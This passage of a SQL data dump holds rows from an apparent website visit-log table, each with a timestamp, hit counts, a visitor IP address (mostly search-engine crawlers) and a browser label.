,0,0,'95.163.255.185','other'),(364416,1546509218,1,1,0,0,'95.163.255.171','other'),(364417,1546509219,1,1,0,0,'95.163.255.160','other'),(364418,1546509424,1,1,0,0,'46.229.168.154','other'),(364419,1546509771,4,4,0,0,'141.8.142.103','other'),(364420,1546509825,2,2,0,0,'178.154.244.11','other'),(364421,1546509860,4,4,0,0,'5.45.207.79','other'),(364422,1546509865,1,1,0,0,'207.46.13.78','other'),(364423,1546510006,2,2,0,0,'5.45.207.19','other'),(364424,1546510036,1,1,0,0,'95.108.213.4','other'),(364425,1546510084,1,1,0,0,'87.250.224.65','other'),(364426,1546510345,1,1,0,0,'66.249.66.157','chrome'),(364427,1546510692,1,1,0,0,'40.77.167.28','other'),(364428,1546510947,1,1,0,0,'95.163.255.181','other'),(364429,1546510950,1,1,0,0,'95.163.255.153','other'),(364430,1546510985,8,8,0,0,'216.244.66.241','other'),(364431,1546511011,1,1,0,0,'95.163.255.93','other'),(364432,1546511015,1,1,0,0,'95.163.255.99','other'),(364433,1546511117,6,6,0,0,'91.196.178.74','chrome'),(364434,1546511134,1,1,0,0,'178.92.37.123','chrome'),(364435,1546511301,1,1,0,0,'91.245.103.140','chrome'),(364436,1546512101,1,1,0,0,'91.196.178.74','chrome'),(364437,1546512278,2,2,0,0,'46.229.168.130','other'),(364438,1546512303,1,1,0,0,'91.196.178.84','chrome'),(364439,1546512407,3,3,0,0,'95.163.255.112','other'),(364440,1546512437,1,1,0,0,'95.163.255.107','other'),(364441,1546512480,2,2,0,0,'95.163.255.105','other'),(364442,1546512509,1,1,0,0,'95.163.255.109','other'),(364443,1546512565,2,2,0,0,'176.120.99.194','chrome'),(364444,1546512842,1,1,0,0,'94.178.159.8','opera'),(364445,1546513047,1,1,0,0,'91.196.178.74','chrome'),(364446,1546513128,1,1,0,0,'66.249.66.154','chrome'),(364447,1546513547,1,1,0,0,'95.163.255.106','other'),(364448,1546513811,10,10,0,0,'216.244.66.241','other'),(364449,1546513856,1,1,0,0,'157.55.39.89','other'),(364450,1546514078,1,1,0,0,'66.249.66.61','chrome'),(364451,1546514079,1,1,0,0,'66.249.66.44','chrome'),(364452,1546514824,1,1,0,0,'95.163.255.168','other'),(364453,1546514826,1,1,0,0,'95.163.255.155','other'),(364454,1546515273,1,1,0,0,'46.229.168.145','other'),(364455,1546515445,1,1,0,0,'66.249.66.155','chrome'),(364457,1546516261,1,1,0,0,'46.229.168.149','other'),(364458,1546516518,3,3,0,0,'195.5.18.3','chrome'),(364459,1546516619,8,8,0,0,'216.244.66.241','other'),(364460,1546516818,1,1,0,0,'66.249.66.42','chrome'),(364461,1546516951,2,2,0,0,'91.197.217.11','firefox'),(364462,1546516991,1,1,0,0,'34.222.117.78','msie'),(364463,1546517351,1,1,0,0,'46.229.168.134','other'),(364464,1546517628,1,1,0,0,'46.229.168.152','other'),(364465,1546517853,1,1,0,0,'95.163.255.190','other'),(364466,1546517856,1,1,0,0,'95.163.255.181','other'),(364467,1546517991,1,1,0,0,'8.29.198.26','other'),(364468,1546518168,1,1,0,0,'46.229.168.138','other'),(364469,1546518541,1,1,0,0,'46.229.168.153','other'),(364470,1546518768,2,2,0,0,'92.52.175.191','chrome'),(364471,1546518866,6,6,0,0,'178.154.244.11','other'),(364472,1546518984,1,1,0,0,'8.29.198.27','other'),(364473,1546519023,2,2,0,0,'141.8.142.103','other'),(364474,1546519065,4,4,0,0,'5.45.207.19','other'),(364475,1546519122,1,1,0,0,'94.45.57.102','chrome'),(364476,1546519421,1,1,0,0,'37.9.113.20','other'),(364477,1546519443,3,3,0,0,'216.244.66.241','other'),(364478,1546519758,1,1,0,0,'5.45.207.79','other'),(364479,1546520328,1,1,0,0,'65.132.59.34','other'),(364480,1546520420,2,2,0,0,'95.163.255.172','other'),(364481,1546520468,3,3,0,0,'216.244.66.241','other'),(364482,1546520648,2,2,0,0,'91.196.178.131','firefox'),(364483,1546520796,2,2,0,0,'89.163.242.241','opera'),(364484,1546521186,2,2,0,0,'66.249.66.154','chrome'),(364485,1546521297,1,1,0,0,'54.165.59.7','other'),(364486,1546521642,1,1,0,0,'66.249.66.44','chrome'),(364487,1546522263,9,9,0,0,'216.244.66.241','other'),(364488,1546522290,1,1,0,0,'95.163.255.168','other'),(364489,1546522293,1,1,0,0,'95.163.255.188','other'),(364490,1546522519,1,1,0,0,'5.196.87.16','other'),(364491,1546522804,1,1,0,0,'46.229.168.146','other'),(364492,1546523397,1,1,0,0,'216.244.66.241','other'),(364493,1546523498,1,1,0,0,'95.163.255.171','other'),(364494,1546523499,1,1,0,0,'95.163.255.182','other'),(364495,1546524145,2,2,0,0,'213.136.75.74','other'),(364496,1546524388,1,1,0,0,'46.229.168.151','other'),(364497,1546525137,7,7,0,0,'216.244.66.241','other'),(364498,1546525708,1,1,0,0,'66.249.66.42','chrome'),(364499,1546525715,2,2,0,0,'91.196.178.73','firefox'),(364500,1546526217,2,2,0,0,'91.196.178.67','chrome'),(364501,1546526465,1,1,0,0,'95.163.255.99','other'),(364502,1546526467,1,1,0,0,'95.163.255.96','other'),(364503,1546526496,1,1,0,0,'207.46.13.189','other'),(364504,1546526972,2,2,0,0,'66.249.66.152','chrome'),(364505,1546527012,1,1,0,0,'157.55.39.231','other'),(364506,1546527339,2,2,0,0,'207.46.13.171','other'),(364507,1546527349,1,1,0,0,'66.249.66.156','chrome'),(364508,1546527354,1,1,0,0,'40.77.167.119','other'),(364509,1546527366,1,1,0,0,'46.229.168.146','other'),(364510,1546527617,2,2,0,0,'54.165.59.7','other'),(364511,1546528002,2,2,0,0,'91.124.182.170','firefox'),(364512,1546528064,3,3,0,0,'216.244.66.241','other'),(364513,1546528116,3,3,0,0,'66.249.66.155','chrome'),(364514,1546528117,3,3,0,0,'66.249.66.152','chrome'),(364515,1546528269,1,1,0,0,'180.76.15.12','other'),(364516,1546528270,1,1,0,0,'180.76.15.15','other'),(364517,1546528301,3,3,0,0,'66.249.66.156','chrome'),(364518,1546528778,2,2,0,0,'5.45.207.19','other'),(364519,1546528824,1,1,0,0,'8.29.198.26','other'),(364520,1546528834,1,1,0,0,'141.8.183.23','other'),(364521,1546528838,1,1,0,0,'178.154.244.21','other'),(364522,1546528881,4,4,0,0,'5.45.207.79','other'),(364523,1546528897,1,1,0,0,'66.249.66.154','chrome'),(364524,1546529033,1,1,0,0,'37.52.203.130','chrome'),(364525,1546529040,3,3,0,0,'216.244.66.241','other'),(364526,1546529104,1,1,0,0,'5.255.253.16','other'),(364527,1546529144,1,1,0,0,'5.255.253.38','other'),(364528,1546529263,1,1,0,0,'213.180.203.17','other'),(364529,1546529285,1,1,0,0,'93.158.166.7','other'),(364530,1546529367,1,1,0,0,'141.8.142.144','other'),(364531,1546529466,1,1,0,0,'141.8.142.65','other'),(364532,1546529507,1,1,0,0,'178.154.244.11','other'),(364533,1546529616,1,1,0,0,'66.249.66.156','chrome'),(364534,1546529827,1,1,0,0,'8.29.198.25','other'),(364535,1546529936,1,1,0,0,'66.249.66.44','chrome'),(364536,1546530049,1,1,0,0,'66.249.66.157','chrome'),(364537,1546530050,1,1,0,0,'66.249.66.154','chrome'),(364538,1546530110,1,1,0,0,'157.55.39.207','other'),(364539,1546530269,1,1,0,0,'180.76.15.14','other'),(364540,1546530559,2,2,0,0,'54.165.59.7','other'),(364541,1546530804,12,12,0,0,'216.244.66.241','other'),(364542,1546530947,1,1,0,0,'46.229.168.129','other'),(364543,1546531243,1,1,0,0,'95.133.129.150','chrome'),(364544,1546531628,1,1,0,0,'46.229.168.151','other'),(364545,1546531974,1,1,0,0,'66.249.66.40','chrome'),(364546,1546532220,1,1,0,0,'216.244.66.241','other'),(364547,1546532231,1,1,0,0,'40.77.167.17','other'),(364548,1546532995,1,1,0,0,'95.163.255.171','other'),(364549,1546532997,1,1,0,0,'95.163.255.185','other'),(364550,1546533411,1,1,0,0,'95.163.255.105','other'),(364551,1546533530,1,1,0,0,'207.46.13.182','other'),(364552,1546533643,8,8,0,0,'216.244.66.241','other'),(364553,1546533779,1,1,0,0,'95.163.255.104','other'),(364554,1546534008,1,1,0,0,'46.229.168.150','other'),(364555,1546534073,1,1,0,0,'207.46.13.84','other'),(364556,1546534291,1,1,0,0,'95.163.255.116','other'),(364557,1546534302,1,1,0,0,'66.249.66.155','chrome'),(364558,1546534303,1,1,0,0,'66.249.66.154','chrome'),(364559,1546534305,2,2,0,0,'95.163.255.109','other'),(364560,1546534327,1,1,0,0,'95.163.255.102','other'),(364561,1546534347,1,1,0,0,'66.249.66.42','chrome'),(364562,1546534642,1,1,0,0,'40.77.167.28','other'),(364563,1546534960,1,1,0,0,'40.77.167.119','other'),(364564,1546534993,1,1,0,0,'157.55.39.207','other'),(364565,1546535609,2,2,0,0,'207.46.13.171','other'),(364566,1546535770,1,1,0,0,'157.55.39.231','other'),(364567,1546535924,1,1,0,0,'46.229.168.151','other'),(364568,1546536004,2,2,0,0,'178.133.106.80','chrome'),(364569,1546536478,7,7,0,0,'216.244.66.241','other'),(364570,1546536491,1,1,0,0,'66.249.66.154','chrome'),(364571,1546536667,2,2,0,0,'40.77.167.17','other'),(364572,1546536755,1,1,0,0,'207.46.13.182','other'),(364573,1546537434,1,1,0,0,'46.229.168.149','other'),(364574,1546537543,1,1,0,0,'207.46.13.109','other'),(364575,1546537546,1,1,0,0,'46.229.168.136','other'),(364576,1546537634,3,3,0,0,'216.244.66.241','other'),(364577,1546537803,1,1,0,0,'176.98.31.199','chrome'),(364578,1546537838,2,2,0,0,'5.45.207.79','other'),(364579,1546537884,1,1,0,0,'66.249.66.42','chrome'),(364580,1546537995,1,1,0,0,'37.9.113.148','other'),(364581,1546538062,2,2,0,0,'91.209.11.236','other'),(364582,1546538069,4,4,0,0,'178.154.244.11','other'),(364583,1546538098,1,1,0,0,'141.8.142.103','other'),(364584,1546538115,2,2,0,0,'5.45.207.19','other'),(364585,1546538472,2,2,0,0,'185.225.17.191','chrome'),(364586,1546538552,1,1,0,0,'66.249.93.204','chrome'),(364587,1546538555,1,1,0,0,'66.249.93.216','chrome'),(364588,1546538747,1,1,0,0,'46.229.168.139','other'),(364589,1546538782,1,1,0,0,'207.46.13.185','other'),(364590,1546538801,1,1,0,0,'46.211.54.80','chrome'),(364591,1546538896,1,1,0,0,'31.41.68.15','chrome'),(364592,1546539157,1,1,0,0,'5.45.207.79','other'),(364593,1546539162,1,1,0,0,'5.45.207.19','other'),(364594,1546539223,1,1,0,0,'46.229.168.152','other'),(364595,1546539315,8,8,0,0,'216.244.66.241','other'),(364596,1546539504,1,1,0,0,'157.55.39.187','other'),(364597,1546539659,1,1,0,0,'8.29.198.27','other'),(364598,1546539872,2,2,0,0,'66.249.66.154','chrome'),(364599,1546539878,1,1,0,0,'40.77.167.17','other'),(364600,1546540207,1,1,0,0,'207.46.13.107','other'),(364601,1546540307,1,1,0,0,'46.229.168.135','other'),(364602,1546540316,1,1,0,0,'46.229.168.136','other'),(364603,1546540358,1,1,0,0,'66.249.66.156','chrome'),(364604,1546540531,1,1,0,0,'66.249.66.59','chrome'),(364605,1546540532,1,1,0,0,'66.249.66.40','chrome'),(364606,1546540674,2,2,0,0,'216.244.66.241','other'),(364607,1546540688,1,1,0,0,'8.29.198.26','other'),(364608,1546541357,1,1,0,0,'207.46.13.109','other'),(364609,1546541981,2,2,0,0,'91.242.162.48','other'),(364610,1546542181,3,3,0,0,'216.244.66.241','other'),(364611,1546542944,1,1,0,0,'157.55.39.187','other'),(364612,1546543254,3,3,0,0,'216.244.66.241','other'),(364613,1546543813,1,1,0,0,'46.229.168.144','other'),(364614,1546544091,2,2,0,0,'66.249.66.156','chrome'),(364615,1546544212,2,2,0,0,'91.196.178.55','chrome'),(364616,1546545004,5,5,0,0,'216.244.66.241','other'),(364617,1546545099,1,1,0,0,'46.229.168.144','other'),(364618,1546545102,1,1,0,0,'46.229.168.136','other'),(364619,1546545110,3,3,0,0,'157.55.39.187','other'),(364620,1546545225,2,2,0,0,'91.242.162.48','other'),(364621,1546545937,1,1,0,0,'5.45.207.79','other'),(364622,1546545975,2,2,0,0,'5.45.207.19','other'),(364623,1546546189,1,1,0,0,'91.196.178.187','chrome'),(364624,1546546198,2,2,0,0,'207.46.13.109','other'),(364625,1546546342,1,1,0,0,'46.229.168.150','other'),(364626,1546546477,1,1,0,0,'46.229.168.149','other'),(364627,1546546941,1,1,0,0,'5.45.207.19','other'),(364628,1546547064,1,1,0,0,'66.249.66.155','chrome'),(364630,1546547133,1,1,0,0,'5.196.87.68','other'),(364631,1546547537,1,1,0,0,'66.249.66.61','chrome'),(364632,1546547538,1,1,0,0,'66.249.66.44','chrome'),(364633,1546547559,1,1,0,0,'66.249.66.57','chrome'),(364634,1546547583,1,1,0,0,'157.55.39.187','other'),(364635,1546547810,9,9,0,0,'216.244.66.241','other'),(364636,1546548827,1,1,0,0,'66.249.66.154','chrome'),(364637,1546549483,1,1,0,0,'207.46.13.185','other'),(364638,1546550092,1,1,0,0,'46.229.168.136','other'),(364639,1546550239,1,1,0,0,'46.229.168.132','other'),(364640,1546550501,1,1,0,0,'8.29.198.27','other'),(364641,1546550712,4,4,0,0,'216.244.66.241','other'),(364642,1546550910,2,2,0,0,'40.77.167.4','other'),(364643,1546550940,1,1,0,0,'157.55.39.187','other'),(364644,1546551011,1,1,0,0,'46.211.64.7','chrome'),(364645,1546551109,1,1,0,0,'46.229.168.146','other'),(364646,1546551261,1,1,0,0,'40.77.167.147','other'),(364647,1546551494,1,1,0,0,'46.229.168.135','other'),(364648,1546551524,1,1,0,0,'8.29.198.27','other'),(364649,1546551800,2,2,0,0,'216.244.66.241','other'),(364650,1546551837,1,1,0,0,'66.249.66.40','chrome'),(364651,1546552275,1,1,0,0,'162.244.150.150','chrome'),(364652,1546552354,1,1,0,0,'23.250.94.181','chrome'),(364653,1546552368,1,1,0,0,'157.55.39.187','other'),(364654,1546552375,1,1,0,0,'66.249.66.156','chrome'),(364655,1546552565,1,1,0,0,'66.249.66.154','chrome'),(364656,1546552887,1,1,0,0,'46.229.168.135','other'),(364657,1546553554,8,8,0,0,'216.244.66.241','other'),(364658,1546553941,5,5,0,0,'178.154.244.11','other'),(364659,1546554004,1,1,0,0,'66.249.66.157','chrome'),(364661,1546554032,1,1,0,0,'5.45.207.19','other'),(364662,1546554194,2,2,0,0,'37.9.113.148','other'),(364663,1546554304,1,1,0,0,'95.108.213.4','other'),(364664,1546554546,2,2,0,0,'216.244.66.241','other'),(364665,1546555041,1,1,0,0,'46.229.168.144','other'),(364666,1546555348,1,1,0,0,'66.249.66.155','chrome'),(364667,1546555349,1,1,0,0,'66.249.66.152','chrome'),(364668,1546555382,1,1,0,0,'5.45.207.79','other'),(364669,1546555795,1,1,0,0,'46.229.168.153','other'),(364670,1546556090,1,1,0,0,'180.76.15.30','other'),(364671,1546556385,6,6,0,0,'216.244.66.241','other'),(364672,1546557259,1,1,0,0,'66.249.66.156','chrome'),(364673,1546557438,1,1,0,0,'46.229.168.152','other'),(364674,1546558090,1,1,0,0,'180.76.15.12','other'),(364675,1546558091,1,1,0,0,'180.76.15.7','other'),(364676,1546558162,1,1,0,0,'46.229.168.141','other'),(364677,1546558212,1,1,0,0,'46.229.168.146','other'),(364678,1546558509,1,1,0,0,'66.249.66.42','chrome'),(364679,1546558850,1,1,0,0,'66.249.66.155','chrome'),(364680,1546558852,1,1,0,0,'66.249.66.156','chrome'),(364681,1546559271,4,4,0,0,'216.244.66.241','other'),(364682,1546559674,1,1,0,0,'66.249.66.154','chrome'),(364683,1546560065,1,1,0,0,'89.252.11.27','chrome'),(364684,1546560724,1,1,0,0,'216.244.66.241','other'),(364685,1546561335,1,1,0,0,'8.29.198.27','other'),(364686,1546561966,1,1,0,0,'66.249.66.57','chrome'),(364687,1546561967,1,1,0,0,'66.249.66.40','chrome'),(364688,1546562024,14,14,0,0,'216.244.66.241','other'),(364689,1546562366,1,1,0,0,'8.29.198.26','other'),(364690,1546562410,3,3,0,0,'60.191.38.77','firefox'),(364691,1546562591,1,1,0,0,'66.249.66.155','chrome'),(364693,1546562602,1,1,0,0,'66.249.66.152','chrome'),(364694,1546563364,1,1,0,0,'159.69.91.3','other'),(364695,1546563455,4,4,0,0,'141.8.142.103','other'),(364696,1546563748,7,7,0,0,'5.45.207.19','other'),(364697,1546563756,6,6,0,0,'5.45.207.79','other'),(364698,1546563817,9,9,0,0,'178.154.244.11','other'),(364699,1546563881,1,1,0,0,'95.108.213.4','other'),(364700,1546564223,1,1,0,0,'207.46.13.46','other'),(364701,1546564370,1,1,0,0,'46.229.168.149','other'),(364702,1546564373,1,1,0,0,'46.229.168.136','other'),(364703,1546564931,4,4,0,0,'216.244.66.241','other'),(364704,1546565021,1,1,0,0,'66.249.66.44','chrome'),(364705,1546565094,1,1,0,0,'95.163.255.152','other'),(364706,1546565271,1,1,0,0,'144.76.71.176','other'),(364707,1546565469,2,2,0,0,'107.150.59.98','other'),(364708,1546565697,1,1,0,0,'95.108.213.4','other'),(364709,1546565986,1,1,0,0,'157.55.39.92','other'),(364710,1546566065,1,1,0,0,'46.229.168.149','other'),(364711,1546566067,1,1,0,0,'46.229.168.151','other'),(364712,1546566153,2,2,0,0,'5.45.207.19','other'),(364713,1546566247,1,1,0,0,'207.46.13.46','other'),(364714,1546566882,2,2,0,0,'66.249.66.152','chrome'),(364715,1546567365,2,2,0,0,'66.249.66.156','chrome'),(364717,1546567397,1,1,0,0,'207.46.13.46','other'),(364718,1546567587,1,1,0,0,'5.45.207.19','other'),(364719,1546567588,2,2,0,0,'178.154.244.11','other'),(364720,1546567716,7,7,0,0,'216.244.66.241','other'),(364721,1546567923,1,1,0,0,'66.249.66.154','chrome'),(364722,1546567926,5,5,0,0,'157.55.39.74','other'),(364723,1546569152,1,1,0,0,'5.45.207.79','other'),(364724,1546569965,2,2,0,0,'141.8.142.103','other'),(364725,1546569985,1,1,0,0,'95.108.213.4','other'),(364726,1546570068,2,2,0,0,'5.45.207.79','other'),(364727,1546570506,1,1,0,0,'46.229.168.142','other'),(364728,1546570538,6,6,0,0,'216.244.66.241','other'),(364729,1546570828,1,1,0,0,'178.154.244.11','other'),(364730,1546571002,2,2,0,0,'66.249.66.155','chrome'),(364731,1546571006,1,1,0,0,'95.163.255.69','other'),(364732,1546571010,1,1,0,0,'95.163.255.65','other'),(364733,1546571059,1,1,0,0,'66.249.66.42','chrome'),(364734,1546571060,1,1,0,0,'40.77.167.96','other'),(364735,1546571127,1,1,0,0,'46.229.168.144','other'),(364736,1546571216,1,1,0,0,'5.45.207.19','other'),(364737,1546571561,1,1,0,0,'66.249.66.152','chrome'),(364738,1546571581,1,1,0,0,'66.249.66.59','chrome'),(364739,1546571582,1,1,0,0,'66.249.66.44','chrome'),(364740,1546571687,1,1,0,0,'66.249.66.157','chrome'),(364741,1546571688,1,1,0,0,'66.249.66.156','chrome'),(364742,1546572162,1,1,0,0,'8.29.198.25','other'),(364743,1546572865,1,1,0,0,'88.99.2.203','other'),(364744,1546573210,1,1,0,0,'8.29.198.27','other'),(364745,1546573226,3,3,0,0,'141.8.142.103','other'),(364746,1546573246,16,16,0,0,'178.154.244.11','other'),(364747,1546573255,7,7,0,0,'5.45.207.19','other'),(364748,1546573361,8,8,0,0,'216.244.66.241','other'),(364749,1546573410,1,1,0,0,'31.1.162.107','chrome'),(364750,1546573437,1,1,0,0,'87.250.224.47','other'),(364751,1546573477,1,1,0,0,'46.229.168.146','other'),(364752,1546573482,2,2,0,0,'5.45.207.79','other'),(364753,1546573507,5,5,0,0,'40.77.167.96','other'),(364754,1546573531,1,1,0,0,'46.229.168.149','other'),(364755,1546573603,2,2,0,0,'95.108.213.4','other'),(364756,1546574158,1,1,0,0,'141.8.142.103','other'),(364757,1546574160,1,1,0,0,'141.8.142.108','other'),(364758,1546574184,2,2,0,0,'178.154.244.11','other'),(364759,1546576149,9,9,0,0,'216.244.66.241','other'),(364760,1546576490,1,1,0,0,'95.163.255.99','other'),(364761,1546576492,1,1,0,0,'95.163.255.92','other'),(364762,1546576557,3,3,0,0,'66.249.66.156','chrome'),(364763,1546576785,2,2,0,0,'5.45.207.19','other'),(364764,1546577121,1,1,0,0,'46.229.168.129','other'),(364765,1546577123,1,1,0,0,'46.229.168.136','other'),(364766,1546577561,1,1,0,0,'46.229.168.137','other'),(364767,1546577563,1,1,0,0,'46.229.168.141','other'),(364768,1546577885,5,5,0,0,'157.55.39.92','other'),(364769,1546578723,1,1,0,0,'46.229.168.143','other'),(364770,1546578852,1,1,0,0,'157.55.39.74','other'),(364771,1546578989,4,4,0,0,'216.244.66.241','other'),(364772,1546578997,1,1,0,0,'178.154.244.11','other'),(364773,1546579025,1,1,0,0,'66.249.66.152','chrome'),(364774,1546579951,1,1,0,0,'66.249.66.157','chrome'),(364775,1546579952,1,1,0,0,'66.249.66.152','chrome'),(364776,1546580031,1,1,0,0,'216.244.66.241','other'),(364777,1546580065,1,1,0,0,'88.99.2.203','other'),(364778,1546580155,2,2,0,0,'34.219.8.197','chrome'),(364779,1546580641,1,1,0,0,'5.45.207.79','other'),(364780,1546580758,1,1,0,0,'46.229.168.135','other'),(364781,1546581531,1,1,0,0,'46.229.168.139','other'),(364782,1546581564,4,4,0,0,'95.108.213.4','other'),(364783,1546581644,4,4,0,0,'178.154.244.11','other'),(364784,1546581652,3,3,0,0,'5.45.207.79','other'),(364785,1546581762,1,1,0,0,'87.250.224.65','other'),(364786,1546581834,3,3,0,0,'5.45.207.19','other'),(364787,1546581842,1,1,0,0,'87.250.224.47','other'),(364788,1546581893,1,1,0,0,'40.77.167.96','other'),(364789,1546581917,3,3,0,0,'216.244.66.241','other'),(364790,1546582225,2,2,0,0,'5.79.113.168','other'),(364791,1546582239,2,2,0,0,'141.8.142.103','other'),(364792,1546582795,1,1,0,0,'46.229.168.150','other'),(364793,1546582903,1,1,0,0,'46.229.168.154','other'),(364794,1546582995,1,1,0,0,'8.29.198.26','other'),(364795,1546583128,2,2,0,0,'66.249.66.154','chrome'),(364796,1546583536,1,1,0,0,'207.46.13.211','other'),(364797,1546583641,2,2,0,0,'94.158.245.114','chrome'),(364798,1546583685,1,1,0,0,'66.249.66.155','chrome'),(364799,1546584046,1,1,0,0,'8.29.198.25','other'),(364800,1546584284,1,1,0,0,'157.55.39.74','other'),(364801,1546584352,1,1,0,0,'46.229.168.138','other'),(364802,1546584399,2,2,0,0,'66.249.66.152','chrome'),(364803,1546584464,1,1,0,0,'40.77.167.96','other'),(364804,1546584752,7,7,0,0,'216.244.66.241','other'),(364805,1546584922,1,1,0,0,'87.250.224.47','other'),(364806,1546584967,1,1,0,0,'66.249.66.156','chrome'),(364807,1546584968,1,1,0,0,'66.249.66.154','chrome'),(364808,1546585492,1,1,0,0,'157.55.39.74','other'),(364809,1546585955,2,2,0,0,'52.53.201.78','chrome'),(364810,1546586046,2,2,0,0,'91.196.178.67','chrome'),(364811,1546586138,1,1,0,0,'207.46.13.211','other'),(364812,1546587542,1,1,0,0,'13.57.233.99','chrome'),(364813,1546587549,3,3,0,0,'91.196.178.67','chrome'),(364814,1546587560,9,9,0,0,'216.244.66.241','other'),(364815,1546587623,1,1,0,0,'46.229.168.154','other'),(364816,1546588740,1,1,0,0,'80.252.153.33','chrome'),(364817,1546589366,1,1,0,0,'46.229.168.129','other'),(364818,1546589639,1,1,0,0,'157.55.39.74','other'),(364819,1546590456,3,3,0,0,'216.244.66.241','other'),(364820,1546590631,5,5,0,0,'5.45.207.19','other'),(364821,1546591026,8,8,0,0,'178.154.244.11','other'),(364822,1546591044,3,3,0,0,'95.108.213.4','other'),(364823,1546591119,2,2,0,0,'87.250.224.65','other'),(364824,1546591326,3,3,0,0,'5.45.207.79','other'),(364825,1546591537,1,1,0,0,'216.244.66.241','other'),(364826,1546591559,3,3,0,0,'66.249.66.156','chrome'),(364827,1546591585,2,2,0,0,'5.45.207.19','other'),(364828,1546591597,1,1,0,0,'46.229.168.145','other'),(364829,1546591711,1,1,0,0,'87.250.224.47','other'),(364830,1546591755,1,1,0,0,'195.211.175.163','chrome'),(364831,1546591834,2,2,0,0,'141.8.142.103','other'),(364832,1546591973,3,3,0,0,'178.154.244.11','other'),(364833,1546592121,1,1,0,0,'46.229.168.132','other'),(364834,1546592123,1,1,0,0,'46.229.168.141','other'),(364835,1546592336,1,1,0,0,'66.249.66.152','chrome'),(364836,1546592386,1,1,0,0,'5.45.207.79','other'),(364837,1546592403,1,1,0,0,'40.77.167.80','other'),(364838,1546592443,1,1,0,0,'95.108.213.4','other'),(364839,1546592574,2,2,0,0,'54.165.59.7','other'),(364840,1546593342,10,10,0,0,'216.244.66.241','other'),(364841,1546593463,1,1,0,0,'66.249.66.152','chrome'),(364842,1546593586,1,1,0,0,'139.59.170.111','other'),(364843,1546593668,1,1,0,0,'95.163.255.155','other'),(364844,1546593825,1,1,0,0,'8.29.198.25','other'),(364845,1546594608,2,2,0,0,'66.249.66.152','chrome'),(364846,1546594724,1,1,0,0,'207.46.13.171','other'),(364847,1546594850,1,1,0,0,'5.45.207.19','other'),(364848,1546594852,1,1,0,0,'188.163.18.181','chrome'),(364849,1546594883,1,1,0,0,'8.29.198.27','other'),(364850,1546595023,1,1,0,0,'66.249.66.157','chrome'),(364851,1546595209,1,1,0,0,'66.249.66.42','chrome'),(364852,1546595328,1,1,0,0,'46.229.168.129','other'),(364853,1546595555,1,1,0,0,'46.229.168.153','other'),(364854,1546595856,1,1,0,0,'91.196.178.67','chrome'),(364855,1546596151,5,5,0,0,'216.244.66.241','other'),(364856,1546596522,1,1,0,0,'95.163.255.94','other'),(364857,1546596525,1,1,0,0,'95.163.255.99','other'),(364858,1546597072,1,1,0,0,'46.229.168.135','other'),(364859,1546597228,1,1,0,0,'40.77.167.67','other'),(364860,1546597554,1,1,0,0,'157.55.39.74','other'),(364861,1546597887,1,1,0,0,'216.244.66.241','other'),(364862,1546598034,1,1,0,0,'66.249.66.157','chrome'),(364863,1546598036,2,2,0,0,'66.249.66.154','chrome'),(364864,1546598455,1,1,0,0,'209.17.96.234','other'),(364865,1546598689,1,1,0,0,'46.229.168.141','other'),(364866,1546598839,1,1,0,0,'66.249.66.156','chrome'),(364867,1546598931,7,7,0,0,'216.244.66.241','other'),(364868,1546599087,1,1,0,0,'5.196.87.10','other'),(364869,1546599336,3,3,0,0,'91.196.178.92','firefox'),(364870,1546600030,1,1,0,0,'46.229.168.143','other'),(364871,1546600032,1,1,0,0,'46.229.168.135','other'),(364872,1546600245,1,1,0,0,'157.55.39.74','other'),(364873,1546600337,1,1,0,0,'87.250.224.47','other'),(364874,1546600424,9,9,0,0,'5.45.207.19','other'),(364875,1546600437,8,8,0,0,'5.45.207.79','other'),(364876,1546600516,3,3,0,0,'178.154.244.11','other'),(364877,1546600553,1,1,0,0,'95.163.255.109','other'),(364878,1546600561,3,3,0,0,'141.8.142.103','other'),(364879,1546600620,2,2,0,0,'95.163.255.115','other'),(364880,1546600757,1,1,0,0,'95.108.213.4','other'),(364881,1546601266,1,1,0,0,'95.163.255.117','other'),(364882,1546601684,2,2,0,0,'91.196.178.171','chrome'),(364883,1546601807,7,7,0,0,'216.244.66.241','other'),(364884,1546602370,1,1,0,0,'66.249.66.44','chrome'),(364885,1546602599,1,1,0,0,'130.180.211.122','chrome'),(364886,1546602878,1,1,0,0,'95.163.255.113','other'),(364887,1546602880,3,3,0,0,'216.244.66.241','other'),(364888,1546602881,1,1,0,0,'95.163.255.102','other'),(364889,1546603135,1,1,0,0,'66.249.66.154','chrome'),(364890,1546603417,1,1,0,0,'46.164.155.109','opera'),(364891,1546603474,1,1,0,0,'66.249.66.59','chrome'),(364892,1546603476,1,1,0,0,'66.249.66.40','chrome'),(364893,1546603499,1,1,0,0,'66.249.66.157','chrome'),(364894,1546603500,1,1,0,0,'66.249.66.152','chrome'),(364895,1546603527,2,2,0,0,'95.47.150.139','firefox'),(364896,1546603625,1,1,0,0,'40.77.167.67','other'),(364897,1546604150,1,1,0,0,'95.163.255.118','other'),(364898,1546604443,1,1,0,0,'95.163.255.116','other'),(364899,1546604656,3,3,0,0,'216.244.66.241','other'),(364900,1546604672,1,1,0,0,'8.29.198.25','other'),(364901,1546604957,2,2,0,0,'157.55.39.58','other'),(364902,1546605018,1,1,0,0,'52.34.93.66','chrome'),(364903,1546605578,1,1,0,0,'123.163.254.15','other'),(364904,1546605596,1,1,0,0,'5.45.207.19','other'),(364905,1546605674,1,1,0,0,'46.229.168.135','other'),(364906,1546605720,1,1,0,0,'8.29.198.26','other'),(364907,1546605773,1,1,0,0,'91.196.178.187','chrome'),(364908,1546605857,1,1,0,0,'40.77.167.67','other'),(364909,1546605954,1,1,0,0,'46.229.168.133','other'),(364910,1546606799,1,1,0,0,'46.133.211.252','chrome'),(364911,1546607183,1,1,0,0,'46.229.168.148','other'),(364912,1546607417,2,2,0,0,'157.55.39.74','other'),(364913,1546607491,7,7,0,0,'216.244.66.241','other'),(364914,1546607768,1,1,0,0,'207.46.13.36','other'),(364915,1546607946,1,1,0,0,'46.229.168.129','other'),(364916,1546607991,2,2,0,0,'91.196.178.67','chrome'),(364917,1546608657,1,1,0,0,'66.249.66.57','chrome'),(364919,1546609191,1,1,0,0,'37.9.113.20','other'),(364920,1546609266,2,2,0,0,'95.108.213.4','other'),(364921,1546609285,2,2,0,0,'5.45.207.79','other'),(364922,1546609319,2,2,0,0,'141.8.142.103','other'),(364923,1546609369,1,1,0,0,'37.9.113.148','other'),(364924,1546609419,1,1,0,0,'95.163.255.112','other'),(364925,1546609471,1,1,0,0,'95.163.255.103','other'),(364926,1546609473,1,1,0,0,'46.229.168.144','other'),(364927,1546610113,1,1,0,0,'178.154.244.11','other'),(364928,1546610343,5,5,0,0,'216.244.66.241','other'),(364929,